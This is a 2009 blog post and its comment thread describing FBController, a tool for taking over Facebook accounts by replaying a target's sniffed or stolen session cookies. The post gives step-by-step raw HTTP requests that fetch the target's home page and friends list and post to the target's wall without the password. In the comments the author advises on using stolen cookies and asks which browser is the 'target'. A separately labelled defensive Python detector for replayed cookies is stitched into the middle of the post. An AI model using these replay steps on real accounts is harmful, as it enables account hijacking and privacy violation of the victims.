Moving Towards Normality

Actions and Attempts towards Blue Sleep

FBConTroller [ FACEBOOK CONTROLLER ] - The Ultimate Facebook Controller (without the Password)


Let me make it clear that this utility WON'T hack/crack Facebook accounts !
The utility needs biscuits/cookies instead of the password.

Log in to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate an OG (original) 10-digit Unix timestamp. If possible, it should not be much older than FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US


3 ] From the Response Obtained :
Obtain the variable nctr[nid]. For now, keep nctr[id] the same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the percent-encoded (hex) format shown in the Cookie header.


4 ] Send a GET Request like below with the above calculated variables :
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php


5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375



7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing / making changes, GOTO 2 ] and REDO :-)
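
Seen from the server side, the requests in steps 2 ] to 8 ] are an existing (c_user, xs) cookie pair arriving from a second client. The following is an added example, not part of the original post or of FBController: it flags that pattern in request records. The record layout, function names and all sample values are constructed (only the MSIE 7.0 User-Agent string comes from the request templates above), and an IP-only change can be benign (NAT, mobile networks), so each alert lists which attributes changed.

```python
# Added example: flag a session cookie pair presented by more than one client.
# Record layout and all sample values are constructed for illustration.


def parse_cookie_header(header):
    """Split a raw Cookie header into a name -> value dict."""
    pairs = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs[name] = value
    return pairs


def find_replayed_sessions(records):
    """Return one alert per extra client fingerprint seen for a (c_user, xs) pair.

    records: iterable of (source_ip, user_agent, cookie_header) in arrival order.
    The first fingerprint seen for a session is treated as its baseline.
    """
    seen = {}  # (c_user, xs) -> list of (ip, user_agent) fingerprints
    alerts = []
    for ip, ua, header in records:
        cookies = parse_cookie_header(header)
        if "c_user" not in cookies or "xs" not in cookies:
            continue  # request carries no session cookie pair
        key = (cookies["c_user"], cookies["xs"])
        fingerprints = seen.setdefault(key, [])
        if (ip, ua) in fingerprints:
            continue  # already known client for this session
        if fingerprints:
            base_ip, base_ua = fingerprints[0]
            changed = []
            if ip != base_ip:
                changed.append("ip")
            if ua != base_ua:
                changed.append("user_agent")
            alerts.append({"c_user": key[0], "source_ip": ip, "changed": changed})
        fingerprints.append((ip, ua))
    return alerts


# Constructed sample records (documentation IP ranges, made-up ids and tokens).
BROWSER_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/3.0.10"
TOOL_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
VICTIM_COOKIE = "c_user=1000000001; xs=" + "a" * 32 + "; locale=en_US"
SAMPLE_RECORDS = [
    ("198.51.100.7", BROWSER_UA, VICTIM_COOKIE),   # owner's browser
    ("198.51.100.7", BROWSER_UA, VICTIM_COOKIE),   # same client again
    ("203.0.113.50", TOOL_UA, VICTIM_COOKIE),      # same cookies, second client
    ("192.0.2.9", "Opera/9.64", "c_user=1000000002; xs=" + "b" * 32),
    ("192.0.2.9", "Opera/9.64", "locale=en_US"),   # no session cookies
]

if __name__ == "__main__":
    for alert in find_replayed_sessions(SAMPLE_RECORDS):
        print(alert)
```
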


Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named FBController (FACEBOOK CONTROLLER), written by me. You can also call it FACEBOOKIE, FACEHOOKER (since it hooks in someone else's cookies), FACEBHOOT or FACEBHOOK.

So far, FBController version 1.0 uses your Target's provided cookie and only :

A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieves your Target's Friends List

More features to come in version 2.0
A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.

Happy Controlling ! :-)


Comments

Azim Poonawala (quakerdoomer) Friday, May 1, 2009 4:26:12 AM

In spite of making it clear at the beginning of the emails to the mailing list and on this Blog-Page itself that FBController DOES NOT HACK/CRACK FB Passwords and NEEDS to be provided the cookies, someone at Threatfire has decided to ignore this and compare FBController to a worm (http://blog.threatfire.com/2009/04/recipe-for-stealing-biscuits.html)
Threatfire says that FBController "**STEALS**" Biscuits !
Also, Threatfire thinks malware distributors have now started distributing malware via mailing lists. ROFL !

It's very disappointing to read such a careless, irresponsible post from something like Threatfire !
I wouldn't be surprised if they develop a signature to thwart FBController from being transferred on the wire !


Azim Poonawala (quakerdoomer) Sunday, May 3, 2009 5:26:17 AM

OKAY Very smart !!

Threatfire Blog (maybe after reading the above comment) quietly changed their statement
From:
"Another technique and tool has just been posted to steal biscuits, much like the Koobface worm, and it supports changing a wall without the password. The author claims to have just completed "FBController - The Ultimate Utility to Control Facebook accounts without the Password". "




To:
"Another technique and tool has just been posted to abuse stolen biscuits, much like the Koobface worm, and it supports changing a wall without the password." "


Good Boy

Anonymous Friday, May 8, 2009 11:49:20 PM

Anonymous writes: I tried this with my own cookie info. I also tried this with a friend's captured cookie data. I always get a "Incorrect Cookie or Cookie Expired" error. Below is the server's response.

HTTP/1.1 301 Moved Permanently
Date: Fri, 08 May 2009 23:44:22 GMT
Server: Apache/1.3.41.fb2
P3P: CP="HONK"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Edge-control: cache-maxage=10m
Location: http://static.ak.facebook.com/login.php
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

0

Any ideas??

Azim Poonawala (quakerdoomer) Saturday, May 9, 2009 3:41:36 PM

Do you get it as soon as you provide the cookie parameters ?
Did you get the Message "Logged in as:" ?
Check if you were able to pull down any of the following :
The Target's Home(First)Page, IntentPage, Ajax Chat Page, Profile Page.
Check if these html files got created in the FBConTroller folder.

Azim Poonawala (quakerdoomer) Saturday, May 9, 2009 7:01:18 PM

I see a new var in the cookie : "Akatest=A". Looks like a not-so-dynamic value. Need to check if absence of this var affects FBConTroller's performance. Hopefully not !

Anonymous Tuesday, May 19, 2009 12:13:51 AM

Yusuf writes: I'm still confused about how to use this tool. When I open this tool a command prompt appears on the desktop, so I read everything and there is a message that tells me to "press any key to continue", and I did what it said, but nothing happened and the command prompt disappeared with nothing changed. I tried again with my FB account open and did the same thing, but nothing happened either. Could you tell me how to use this tool, maybe step by step? I'm sorry, thanks a lot.

Anonymous Monday, May 25, 2009 4:10:59 PM

Anonymous writes: FBConTroller version 2.0

Anonymous Thursday, May 28, 2009 7:08:47 PM

Anonymous writes: can you provide a step by step guide to us that dont know html that well?

Azim Poonawala (quakerdoomer) Sunday, May 31, 2009 6:12:42 PM

Are you asking me to teach you HTML ????

Anonymous Tuesday, June 2, 2009 10:25:10 PM

Bernhard writes: I cant seem to find the XS var. ? Is it still there?

Azim Poonawala (quakerdoomer) Wednesday, June 3, 2009 5:32:50 PM

Bernhard : FB is crazy at times. There was a day when I couldn't find ABT. It came back the next day. Try and delete your Temp Files, old cookies. Make sure your login email isn't appearing in the Username TextBox. Let me know.

P.S. Version 2 will eliminate the need to type/paste in individual variables.

Anonymous Monday, June 29, 2009 1:59:15 PM

thunderbolt writes: can u tell me how to use that tool step by step? because, i have tried but that didn't work thanx doomer ^_^

Anonymous Sunday, July 5, 2009 8:42:49 PM

Anonymous writes: I am in the same position as the previous person. It would be highly appreciated if you can create a Step by step guide on how to use this Program. Thank You!

Anonymous Friday, July 10, 2009 5:24:29 PM

Anonimo writes: Hi Azim, I tried to understand but I have a problem: where can I find the "53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES"? Thanks a lot

Anonymous Thursday, July 16, 2009 4:13:05 AM

Anónimo writes: how do I use the FBcontroller program?

Anonymous Sunday, July 26, 2009 7:40:01 AM

Blu3 D3v1L writes: Great Job! I couldn't use it though, because I couldn't find all the cookies required: xs, c_user and h_user. However, as far as I have read, the power of FBController is very limited. I hope that you will release a more powerful version soon. One more thing: it would be great if you released a GUI version too, because most people are not familiar with coding.

Anonymous Sunday, July 26, 2009 7:59:15 AM

Blu3 D3v1L writes: Is there any way to actually do anything with this? I entered my cookies and some friends' as well but was unable to do anything with it. Maybe you can help with logging in to Facebook with those cookies?

Anonymous Monday, August 3, 2009 4:44:38 PM

rasta writes: hello, if I got the cookie, what should I do?? where is the function fbcontroller?? thnx

Anonymous Sunday, October 25, 2009 4:33:50 PM

Wanderer writes: Hi there, Is it possible to set cookie parameters manually in browser? If yes which parameters should I consider adding? I usually use Firefox add-ons to edit cookie and set it to what I want. I just don't know how should I do it with fb cookies.

Anonymous Tuesday, November 17, 2009 9:12:02 AM

valipour writes: hello, I have a question: if I have an account username, can I get its password, or how can I get it? thanks

Anonymous Wednesday, November 25, 2009 8:37:37 PM

Anonymous writes: kacook banyak nian tegawe apo>..?????

Anonymous Friday, December 11, 2009 3:07:12 AM

don writes: can i get/use cookies saved from a web browser instead of sniffing around.

Azim Poonawala (quakerdoomer) Saturday, December 12, 2009 8:33:12 AM

You can but you won't find all the cookie variables.
Even if you do find them all, it won't work coz not all of them are static in nature. Example : xs

If you are stealing cookies from a web-browser, they have to be used before they are destroyed that is before the user signs off. Same goes when you retrieve cookies via sniffing.

Do you have any specific browser as your target ?

Anonymous Monday, January 4, 2010 7:32:01 PM

Anonymous writes: how can I get the cookies?? could you explain it to me in a simple way?

Azim Poonawala (quakerdoomer) Wednesday, January 6, 2010 7:08:27 AM

Fushk uyaklu ben dianu Holland Poland Roland ??
Translate that !

Anonymous Thursday, January 7, 2010 3:42:10 PM

Anonymous writes: hi ! The program isn't working at all. It opens the window and asks to press any key, and when I do, it shuts down. Pls show a step by step of how to do this. It doesn't have to be detailed, but at least let us know the basics. I'm not an expert with code but I'm sure I learn quickly. Thank you.

Azim Poonawala (quakerdoomer) Thursday, January 7, 2010 7:27:19 PM

I am sure you just downloaded FBController without reading the FAQ which is on the same page right below the Screenshots and the Download LINK. THE FAQ HAS BEEN SPECIALLY WRITTEN TO answer such queries.

I am tired of answering these "step-by-step guide", "oh-it-just-goes-away-after-Press-any-key" questions.

From now onwards, the answer is :
The program checks the user's IQ and then decides on its own whether to work or not.

Anonymous Friday, January 8, 2010 4:53:26 PM

Anonymous writes: lol sry man. I know how to work it now. I just don't understand the part about getting the cookie. I know now what I was doing wrong, and that was through ur instructions of pressing the .bat file. So my question was whether u can explain the part about getting the cookie in a way that is a bit more explained through steps, for people with less IQ than yours, like myself :D

Azim Poonawala (quakerdoomer) Saturday, January 9, 2010 10:47:21 AM

No ! I did not ask you to run the batch file. I told this to an Anonymous person here .. : http://my.opera.com/quakerdoomer/blog/fbcontroller-v3-0-facebook-control-utility-version-3-0#comments

.. who asked me why he was seeing just the startup screen with the Syntax despite pasting the cookie in the Cookie.TXT file.
That anonymous person was not giving the argument to the exe. So he was told to do that OR to run the batch file

Don't blame me for any of your actions !

And about how to get the cookie.. you are really not reading my answers.
I don't want to be rude but :
READ THE FAQ
REFER Q2 of FAQ which says :
"Q2. How do I get the cookie ?"

If you still can't get the cookie. Send me your FB Login and password. I'll send you back your cookie !

And you were wrong about my IQ coz the program sometimes refuses to work for me as well printf-ing "Stupid User Found"

Anonymous Tuesday, March 30, 2010 11:12:30 AM

francesco Veritti writes: hi, i didnt found h_user, i find all in the cookies and sniffing whit wireshark and smsniff, but i cannot find the h_user. i found something like as GET /ap.php?i=AAAAAwAgACAAAAD3iy55gQvbw2V3qnf4j2JpJWBB7N9VnF_JRyIuCRVPeo2l0fYlVRmcFxOfAm66Jm_yTcXnvOSGaKZT0bFOPsVImfNKtWSh8NzkAmQtje4VlBHGWrT2nmJ1bDDA-6yWxBq8Dp_DnLmZqutTgvnedyRJ5fJtoIfehRUTMMPEtwGQN4PeEuFM-VMZNA99FR_DtEvAN9pbAyEkTrQtg-N8ZQ9fwce_qVb2OmDt3YZ4qOc8h9DlqyrMyfRI_W_pM66L1rjxDMLbPI2i3_aMMlKO8zNpZDhL1rAf83Dh7lsSwMTLjnXJNTR01KsWobqPssYDsElIn7PazfVWlp0_RaXYBHUk2JgYL5_hFpIvCQR5RrLsl0zHV-Io3l2cqjU_JpOtcde-I--7WQkrGkCVP-eSBT5nHufRDYgFLgcnqCPvAZYPB4Q. HTTP/1.1 but the code is too long for be a h_user. pls let me know how to get h_user variable. thanks

Azim Poonawala (quakerdoomer) Tuesday, March 30, 2010 6:37:49 PM

francesco Veritti :

Try and put a GET request to /home.php using your browser and then sniff
The variable h_user used to be in the "Cookie:" part but these days we don't find it. Instead we see something new called "lo". This is a 22-character alphanumeric string.


One more interesting observation is : http://www.facebook.com/robots.txt

It says :
Disallow: /ap.php

So please try and access some other allowed page and then try and sniff the packets.



FBController v3 which is currently available (as of 31st March 2010) won't get you anywhere other than the Main page coz its other modules need to be modified accordingly which includes GUI action changes and the Cookie variables modifications.



One more reason for everyone to push me to go open source.

Anonymous Thursday, April 1, 2010 10:25:29 AM

Ismaila writes: Forgotten password and have forgotten every link to get a new one but dont want a new email what am i to do.

Azim Poonawala (quakerdoomer) Friday, April 2, 2010 5:49:12 PM

Ismaila, Take a rebirth.

Anonymous Wednesday, April 14, 2010 11:31:04 AM

Mohmd writes: I use Leorat.com for spy with keylogger, this software use jpg for infection

Azim Poonawala (quakerdoomer) Thursday, April 15, 2010 8:37:07 AM

What ?

Anonymous Tuesday, April 27, 2010 8:39:27 PM

curiousbystander writes: Hi, I searched Google for "X-SVN-Rev:" and I got here. Do you guys know how the X-SVN-Rev parameter is calculated, and what does it mean?

Anonymous Tuesday, April 27, 2010 8:52:28 PM

curiousbystander writes: Actually, by "any of you guys" i mean Azim . :)

curiousbystander Tuesday, April 27, 2010 8:58:42 PM

here, im not anonymous anymore

Azim Poonawala (quakerdoomer) Thursday, April 29, 2010 4:22:07 AM

Hi curiousbystander,
I reply to queries made by anons as well.. you can check.
X-SVN-Rev has to be the trunk release number for some source FB maintains using subversion. I don't know for which code, but SVN stands for subversion and Rev definitely stands for Revision (number).
FB uses python a lot in the backend.
Hope that helps.
To know more about subversion, refer to : http://subversion.tigris.org/

Anonymous Wednesday, July 28, 2010 4:54:30 PM

Gianluca writes: Hi, I'd like to try facebook controller but it seems that the download page doesn't work... are there any other pages where to download it please?

Azim Poonawala (quakerdoomer) Wednesday, July 28, 2010 6:12:17 PM

No.

Anonymous Monday, March 14, 2011 5:16:06 PM

Anonimo writes: After the new facebook upgrade where I can find the cookies??

Azim Poonawala (quakerdoomer) Monday, March 14, 2011 6:58:14 PM

In your stomach, else you'll need to downgrade it :-P

Anonymous Monday, March 14, 2011 7:18:24 PM

Tiger writes: Is there a new version of FBConTroller? i want to manage few facebook accounts together instead of logging-in each and every one of them

Azim Poonawala (quakerdoomer) Tuesday, March 15, 2011 9:05:46 AM

Wow Tiger.. nice alibi.. You make FB sound like a bank :-P
